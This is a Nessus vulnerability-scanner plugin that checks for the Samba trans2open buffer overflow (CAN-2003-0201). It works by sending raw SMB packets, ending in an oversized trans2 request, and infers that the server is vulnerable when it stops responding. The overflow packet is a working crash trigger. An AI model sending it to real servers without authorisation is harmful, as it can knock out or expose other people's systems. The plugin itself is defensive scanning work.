#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#
# Ref:
#  Date: Mon, 7 Apr 2003 07:44:58 +0000 (UTC)
#  From: Erik Parker <erik.parker@digitaldefense.net>
#  To: vulnwatch@vulnwatch.org
#  Subject: [VulnWatch] [DDI-1013] Buffer Overflow in Samba allows remote root compromise
#

if(description)
{
 script_id(11523);
 script_cve_id("CAN-2003-0201", "CAN-2003-0196");
 script_bugtraq_id(7294);
 if ( defined_func("script_xref") ) script_xref(name:"RHSA", value:"RHSA-2003:137-02");
 if ( defined_func("script_xref") ) script_xref(name:"SuSE", value:"SUSE-SA:2003:025");

 
 script_version ("$Revision: 1.7 $");

 name["english"] = "Samba trans2open buffer overflow";

 script_name(english:name["english"]);
 
 desc["english"] = "
The remote Samba server is vulnerable to a buffer overflow
when it processes the function trans2open().

An attacker may exploit this flaw to gain a root shell on
this host.

Solution : upgrade to Samba 2.2.8a or 3.0.0
Risk factor : High";


 script_description(english:desc["english"]);
 
 summary["english"] = "overflows the remote samba server";
 
 script_summary(english:summary["english"]);
 
 script_category(ACT_ATTACK);
 
 
 script_copyright(english:"This script is Copyright (C) 2003 Renaud Deraison",
		francais:"Ce script est Copyright (C) 2003 Renaud Deraison");
 family["english"] = "Gain root remotely";
 family["francais"] = "Passer root  distance";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("smb_nativelanman.nasl");
 script_require_keys("SMB/samba");
 exit(0);
}

#
# The script code starts here
#
include("smb_nt.inc");  # for smb_recv()
port = get_kb_item("SMB/transport");
if(!port)port = 139;
if(!get_port_state(port))exit(0);




ssetup = raw_string(0x00, 0x00, 0x00, 0x2e, 0xff, 0x53, 0x4d, 0x42, 0x73, 0x00, 0x00, 0x00, 0x00, 0x08,
                   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x20, 0x02, 0x00, 0x01,
                   0x00, 0x00, 0x00, 0x00);
                   
                   
treeconnect = raw_string(0x00, 0x00, 0x00, 0x3c, 0xff, 0x53, 0x4d, 0x42, 0x70, 0x00, 0x00, 0x00, 0x00, 0x00,
           0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x64, 0x00,
           0x00, 0x00, 0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5c, 0x5c, 0x69, 0x70, 0x63, 0x24,
           0x25, 0x6e, 0x6f, 0x62, 0x6f, 0x64, 0x79, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x49, 0x50,
           0x43, 0x24);
           
trans2 = raw_string(
            0x00, 0x00, 0xA, 0x00, 0xff, 0x53, 0x4d, 0x42, 0x32, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
        0x64, 0x00, 0x00, 0x00, 0x00, 0xd0, 0x07, 0x0c, 0x00, 0xd0, 0x07, 0x0c, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd0, 0x07, 0x43, 0x00, 0x0c, 0x00, 0x14, 0x08, 0x01,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x90) +
        crap(4096 - strlen(trans2));
        
        
soc = open_sock_tcp(port);
if(!soc)exit(0);


send(socket:soc, data:ssetup);
r = smb_recv(socket:soc);
if(strlen(r) < 33)exit(0);
    
send(socket:soc, data:treeconnect);
r = smb_recv(socket:soc);
if(!r)exit(0);

send(socket:soc, data:trans2);
r = smb_recv(socket:soc);
if(!r)security_hole(port);
close(soc);
